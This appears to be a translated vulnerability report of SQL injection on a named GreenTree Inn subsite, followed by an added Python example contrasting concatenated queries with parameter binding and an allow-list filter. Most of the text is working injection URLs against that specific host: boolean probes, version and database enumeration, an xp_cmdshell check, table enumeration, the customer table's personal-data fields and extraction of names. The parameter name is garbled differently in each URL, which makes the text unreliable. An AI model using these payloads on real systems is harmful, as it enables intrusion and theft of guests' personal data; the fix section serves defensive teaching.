SQL injection vulnerability in a subsite of GreenTree Inn

Source: Internet
Author: User


A subsite of GreenTree Inn has a SQL injection vulnerability at:
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?Country code=531001


Enter ' and '1'='1

Enter ' and '1'='2

View database version
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?Response code=531001' and 1=(select @@VERSION) and '1'='1

Current Database Name

Local service name


24 Databases
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?Response code=531001' and 24=(select count(name) from master.dbo.sysdatabases) and '1'='1

XP_CMDSHELL exists
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?Repeated code=531001' and 1=(select count(name) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell') and '1'='1

XP_regread extended stored procedure exists

Enumerating table names
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?Export Code=531001' and 1=(select top 1 name from sysobjects where xtype='U') and '1'='1


select top 1 name from sysobjects where xtype='U' and name not in ('turnstable','crscount')
select top 1 name from sysobjects where xtype='U' and name not in ('turnstable','crscount','blacklist')
select top 1 name from sysobjects where xtype='U' and name not in ('turnstable','crscount','blacklist','iccard_request','m_initrebate','customer')
There are 672 tables in total; they are not all listed here.
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?Export Code=531001' and 672=(select count(name) from sysobjects where xtype='U') and '1'='1

Taking the Customer table as an example of the table fields, it has 39 fields, as follows:
CustomerCode
FirstName
LastName
MiddleName
NickName
Gender
Birthday
NationalityID
Race
Title
Language1
Language2
CustomerTypeID
TravelAgentID
CustomerOrigin
Region1
Region2
Note1
Note2
Company
Address
Telephone
Zip
VisaID
ExpirationDate
IDTypeID
IDNumber
VIPLevel
VIPNumber
CreateDate
UploadFlag
Priority
Mobile
CompanyTel
CompanyFax
MemberType
MemberNo
UploadDate
Response Code
View a field
http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?Response code=531001' and 1=(select top 1 FirstName from Customer) and '1'='1

Solution:

Filter
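
What the filter has to achieve, as an added example that is not part of the original report or the site's code: the same lookup written with string concatenation, with a bound parameter, and with an allow-list filter in front of the bound query. Python's sqlite3 stands in for the site's SQL Server, and the room table, its columns and the numeric code format are assumptions.

```python
import re
import sqlite3

PROBES = ("531001' and '1'='1", "531001' and '1'='2")  # the two inputs from the page

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE room (code TEXT PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO room VALUES ('531001', 'Sample room')")
    return db

def lookup_vulnerable(db, code):
    # Flaw: the request value is pasted into the SQL text, so a quote in it
    # closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT name FROM room WHERE code = '" + code + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, code):
    # Fix: the value is bound as a parameter and only ever compared as data.
    return db.execute("SELECT name FROM room WHERE code = ?", (code,)).fetchall()

CODE_RE = re.compile(r"[0-9]{1,10}")  # assumed format: a short numeric code

def lookup_filtered(db, code):
    # "Filter" as an allow-list in front of the bound query: reject anything
    # that is not a numeric code before it reaches the database.
    if not CODE_RE.fullmatch(code):
        raise ValueError("invalid code")
    return lookup_bound(db, code)

def answers_differ(lookup, db):
    # True when the '1'='1 and '1'='2 probes get different answers, which is
    # the sign that the input is being evaluated as SQL.
    true_rows, false_rows = (lookup(db, p) for p in PROBES)
    return true_rows != false_rows

if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup, probes differ:", answers_differ(lookup_vulnerable, db))
    print("bound lookup, probes differ:", answers_differ(lookup_bound, db))
    for p in PROBES:
        try:
            lookup_filtered(db, p)
        except ValueError as exc:
            print("filtered lookup rejected", repr(p), "->", exc)
```

In an ASP.NET page the equivalent of lookup_bound is a SqlCommand with the value supplied through its Parameters collection instead of being concatenated into the command text.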
